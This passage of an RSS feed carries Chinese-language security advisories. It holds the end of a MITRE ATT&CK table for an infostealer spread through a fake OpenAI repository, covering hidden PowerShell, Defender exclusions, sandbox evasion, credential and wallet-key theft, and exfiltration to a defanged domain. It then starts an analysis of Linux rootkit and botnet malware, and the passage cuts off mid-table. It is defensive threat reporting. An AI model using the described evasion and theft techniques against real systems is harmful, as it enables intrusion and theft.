leaf="">T1059.006</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">loader.py</span></font><font face="宋体"><span leaf="">作为初始执行入口。</span></font></span></p></td></tr><tr><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Execution</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Command and Scripting Interpreter: PowerShell</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">T1059.001</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="宋体"><span leaf="">以</span></font><font face="Arial"><span leaf="">WindowStyle Hidden</span></font><font face="宋体"><span leaf="">隐藏执行下载后阶段命令。</span></font></span></p></td></tr><tr><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Defense Evasion</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Impair Defenses: Disable or Modify Tools</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">T1562.001</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="宋体"><span leaf="">禁用</span></font><font face="Arial"><span leaf="">SSL</span></font><font face="宋体"><span leaf="">校验；写入</span></font><font face="Arial"><span leaf="">Microsoft Defender</span></font><font face="宋体"><span leaf="">排除项。</span></font></span></p></td></tr><tr><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Defense Evasion</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Virtualization/Sandbox Evasion: System Checks</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">T1497.001</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">VM/</span></font><font face="宋体"><span leaf="">沙箱</span></font><font face="Arial"><span leaf="">/</span></font><font face="宋体"><span leaf="">调试器</span></font><font face="Arial"><span leaf="">/</span></font><font face="宋体"><span leaf="">分析工具检测，仅在真实主机执行。</span></font></span></p></td></tr><tr><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Credential Access</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Credentials from Password Stores: Web Browsers</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">T1555.003</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="宋体"><span leaf="">提取</span></font><font face="Arial"><span leaf="">Chromium/Gecko</span></font><font face="宋体"><span leaf="">浏览器保存的密码与令牌。</span></font></span></p></td></tr><tr><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Credential Access</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Unsecured Credentials: Private Keys</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">T1552.004</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="宋体"><span leaf="">采集</span></font><font face="Arial"><span leaf="">SSH/VPN/</span></font><font face="宋体"><span leaf="">加密钱包私钥与种子短语。</span></font></span></p></td></tr><tr><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Collection</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Screen Capture</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">T1113</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="宋体"><span leaf="">抓取主机多显示器全屏截图。</span></font></span></p></td></tr><tr><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Exfiltration</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Exfiltration Over C2 Channel</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">T1041</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="宋体"><span leaf="">通过</span></font><font face="Arial"><span leaf="">HTTP</span></font><font face="宋体"><span leaf="">将压缩数据外泄至</span></font><font face="Arial"><span leaf="">recargapopular[.]com</span></font><font face="宋体"><span leaf="">。</span></font></span></p></td></tr></tbody></table></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">参考链接</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1.<a href="https://www.bleepingcomputer.com/news/security/fake-openai-repository-on-hugging-face-pushes-infostealer-malware/" target="_blank">https://www.bleepingcomputer.com/news/security/fake-openai-repository-on-hugging-face-pushes-infostealer-malware/</a></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2.<a href="https://mp.weixin.qq.com/s/ISmX8_uPhNceGdiMBucJLw" target="_blank">https://mp.weixin.qq.com/s/ISmX8_uPhNceGdiMBucJLw</a></span></p></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=29b3bcce&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525577%26idx%3D1%26sn%3D5f71c741c56237738ad5c7cf6519a70f">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 12 May 2026 19:51:00 +0800</pubDate>
    </item>
    <item>
      <title>【恶意文件通告】Linux多功能病毒分析</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525577&amp;idx=2&amp;sn=f77ac8f1303ea4b3e5b5dc78b8881b71</link>
      <description>近期，深信服千里目安全技术中心监测到一起Linux后门事件、经过深度分析排查发现该事件与UTG-Q-008团伙存在关联，该家族是针对Linux平台的威胁行为者，主要针对中国政府机构和企业实体，利用庞大的僵尸网络进行间谍活动。</description>
      <content:encoded><![CDATA[<p><span>深瞻情报实验室</span> <span>2026-05-12 19:51</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=d121fda5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FAPc6NwjLsxQbRJprWqaDC8Qf3PKVr8dSWGQUN3a0ia4xbicOVAWnUPHEfx1wPMvUbyTazIzaFVgib89yuKQoktJDxiaa2ia4Lo8lbKTgubJ0ttbQ%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100041922" data-ratio="0.16635687732342008" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="gif" data-w="1076" src="https://wechat2rss.xlab.app/img-proxy/?k=3da70c4f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxQq6hpd45HpD2J8DyTvGFFz2AG6eXl4bexWvFx2pHyoH1nyQGNd3miatZISbwJc4lCTEH56kpgyu6Mg1HQ2EwjuB4ibOBETUDPKs%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 25px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 94%;vertical-align: top;border-style: solid;border-width: 1px;border-color: rgb(13, 74, 182);flex: 0 0 auto;align-self: flex-start;height: auto;box-shadow: rgb(13, 74, 182) 6px 6px 0px;background-color: rgb(255, 255, 255);box-sizing: border-box;"><div style="margin: 18px 0% 0px;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 23px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">近期，深信服千里目安全技术中心监测到一起Linux后门事件、经过深度分析排查发现该事件与UTG-Q-008团伙存在关联，该家族是针对Linux平台的威胁行为者，主要针对中国政府机构和企业实体，利用庞大的僵尸网络进行间谍活动。</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">恶意文件概要</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><table style="border-collapse:collapse;width:426.1000pt;border:none;mso-border-left-alt:0.5000pt solid windowtext;mso-border-top-alt:0.5000pt solid windowtext;mso-border-right-alt:0.5000pt solid windowtext;mso-border-bottom-alt:0.5000pt solid windowtext;mso-border-insideh:0.5000pt solid windowtext;mso-border-insidev:0.5000pt solid windowtext;mso-padding-alt:0.0000pt 5.4000pt 0.0000pt 5.4000pt;"><tbody><tr><td data-colwidth="104" valign="center"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;margin: 0pt;text-indent: 0pt;break-after: avoid;"><b><font face="仿宋_GB2312"><span leaf="" style="font-family: 宋体;font-size: 12pt;">恶意文件</span></font></b><b><font face="仿宋_GB2312"><span leaf="" style="font-family: 宋体;font-size: 12pt;">名称</span></font></b></p></td><td data-colwidth="747" width="747" valign="center"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: left;margin: 0pt;text-indent: 0pt;break-after: avoid;"><b><font face="Times New Roman"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;"><span textstyle="" style="font-weight: normal;">Linux</span></span></font><font face="仿宋_GB2312"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;"><span textstyle="" style="font-weight: normal;">多功能病毒分析</span></span></font></b></p></td></tr><tr><td data-colwidth="104" valign="center"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;margin: 0pt;text-indent: 0pt;break-after: avoid;"><b><font face="仿宋_GB2312"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;">发布时间</span></font></b></p></td><td data-colwidth="747" width="747" valign="center"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: left;margin: 0pt;text-indent: 0pt;break-after: avoid;"><b><font face="Times New Roman"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;"><span textstyle="" style="font-weight: normal;">2026</span></span></font></b><b><font face="仿宋_GB2312"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;"><span textstyle="" style="font-weight: normal;">年</span></span></font></b><b><font face="Times New Roman"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;"><span textstyle="" style="font-weight: normal;">5</span></span></font></b><b><font face="仿宋_GB2312"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;"><span textstyle="" style="font-weight: normal;">月</span></span></font></b><b><font face="Times New Roman"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;"><span textstyle="" style="font-weight: normal;">12</span></span></font></b><b><font face="仿宋_GB2312"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;"><span textstyle="" style="font-weight: normal;">日</span></span></font></b></p></td></tr><tr><td data-colwidth="104" valign="center"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;margin: 0pt;text-indent: 0pt;break-after: avoid;"><b><font face="仿宋_GB2312"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;">威胁</span></font></b><b><font face="仿宋_GB2312"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;">类型</span></font></b></p></td><td data-colwidth="747" width="747" valign="center"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: left;margin: 0pt;text-indent: 0pt;break-after: avoid;"><b><font face="Times New Roman"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;"><span textstyle="" style="font-weight: normal;">Rootkit</span></span></font></b><b><font face="仿宋_GB2312"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;"><span textstyle="" style="font-weight: normal;">、后门、</span></span></font><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;"><span textstyle="" style="font-weight: normal;">D</span></span></b><b><font face="Times New Roman"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;"><span textstyle="" style="font-weight: normal;">DoS</span></span></font></b><b><font face="仿宋_GB2312"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;"><span textstyle="" style="font-weight: normal;">、僵尸网络</span></span></font></b></p></td></tr><tr><td data-colwidth="104" width="104" valign="center"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;margin: 0pt;text-indent: 0pt;break-after: avoid;"><b><font face="仿宋_GB2312"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;">简单描述</span></font></b></p></td><td data-colwidth="747" width="747" valign="center"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: left;margin: 0pt;text-indent: 0pt;break-after: avoid;"><b><font face="仿宋_GB2312"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;"><span textstyle="" style="font-weight: normal;">攻击者通过多个恶意文和开源软件的组合利用实现实现内核</span></span></font><font face="Times New Roman"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;"><span textstyle="" style="font-weight: normal;">Rootkit</span></span></font><font face="仿宋_GB2312"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;"><span textstyle="" style="font-weight: normal;">隐藏、后门部署、僵尸网络搭建和流量代理转发等多种高危害行为。</span></span></font></b></p></td></tr></tbody></table></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">恶意文件分析</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041921" src="https://wechat2rss.xlab.app/img-proxy/?k=4efa009f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxQx6ev48HNDZicSvXL9AlG4AAEgCiaGPlibwNicItrHRAe1GjnHnS1NL9T4ltiavsNE7nBDUEP3Pdgak9l9o4n0xToXvHLlrvCLv5jA%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">恶意文件描述</span></b></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">近期，深信服千里目安全技术中心监测到一起Linux后门事件、经过深度分析排查发现该事件与UTG-Q-008团伙存在关联，该家族是针对Linux平台的威胁行为者，主要针对中国政府机构和企业实体，利用庞大的僵尸网络进行间谍活动。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041924" src="https://wechat2rss.xlab.app/img-proxy/?k=2cf747be&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxRMdJHQbao4y0EMLjxcxsG4rycsMcBgxlNqfibG1mBsZ6XP5VpX1MwIl6uhddok9EFcSazpmNSDHD9nh46KXuCEHJzd8gVYTUxg%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">恶意文件分析</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">此次攻击一共发现三个文件，涵盖了代理转发、权限维持、漏洞扫描和利用、DDos、后门等常见的操作。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="font-size: 17px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-size: 18px;">1.dnsresolve</span></span></span></strong></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">该样本为SS5 Socks Server Version 3.8.9 - Release 8，是一个开源 SOCKS5 代理服务器软件。使用gcc (GNU) 4.1.2 20080704 (Red Hat 4.1.2-55)进行编译，主要包含了如下功能：</span></p><table style="border-collapse:collapse;width:426.1000pt;mso-table-layout-alt:fixed;border:none;mso-border-left-alt:0.5000pt solid rgb(223,226,229);mso-border-top-alt:0.5000pt solid rgb(223,226,229);mso-border-right-alt:0.5000pt solid rgb(223,226,229);mso-border-bottom-alt:0.5000pt solid rgb(223,226,229);mso-padding-alt:0.0000pt 0.0000pt 0.0000pt 0.0000pt;"><tbody><tr><td data-colwidth="205" width="205" valign="center"><p style="text-align: center;margin: 0pt;text-indent: 0pt;break-after: avoid;"><b><font face="宋体"><span leaf="" style="font-family: 宋体;font-weight: bold;font-size: 12pt;">函数名</span></font></b></p></td><td data-colwidth="123" width="123" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">地址</span></font></span></b></p></td><td data-colwidth="84" width="84" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">大小</span></font></span></b></p></td><td data-colwidth="440" width="440" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">功能</span></font></span></b></p></td></tr><tr><td data-colwidth="205" width="205" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt;border-style: solid;border-color: rgb(223, 226, 229);"><p 